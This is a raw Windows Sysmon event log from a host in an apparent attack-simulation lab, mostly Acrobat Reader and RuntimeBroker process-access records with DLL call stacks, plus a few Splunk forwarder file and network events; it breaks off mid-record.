12:30:03.763{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C85C4DE1F6DCD8E1DF642A6ACF51C5AF,SHA256=FB043B7C1522F4C86577C7E58D60E69BB7EAB2306129906DA86808032E92518A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.747{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000046746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.520{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56471-false10.0.1.12-8000- 23542300x800000000000000046745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.467{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A14D37A4F2D0FA2EA488BDEA42508A,SHA256=864E5D48630C1B12A8D3ADD5B1C376A433D29C47C7BE7A5DCA9D5BEC7C43D600,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.355{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.355{FE4C2B44-DDF7-63C7-B204-00000000AF02}48486748C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7e2|C:\Windows\System32\combase.dll+63d23|C:\Windows\System32\combase.dll+3e9ed|C:\Windows\System32\combase.dll+6207f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000046742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.354{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.354{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.354{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba 10341000x800000000000000046739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.354{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.354{FE4C2B44-DDF7-63C7-B204-00000000AF02}48483128C:\Windows\System32\RuntimeBroker.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aea4a|C:\Windows\System32\combase.dll+a580d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65413|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07 10341000x800000000000000046737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.353{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.353{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.353{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba 10341000x800000000000000046734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.353{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.352{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.352{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.352{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba 10341000x800000000000000046730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.352{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.351{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3b9ba|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files 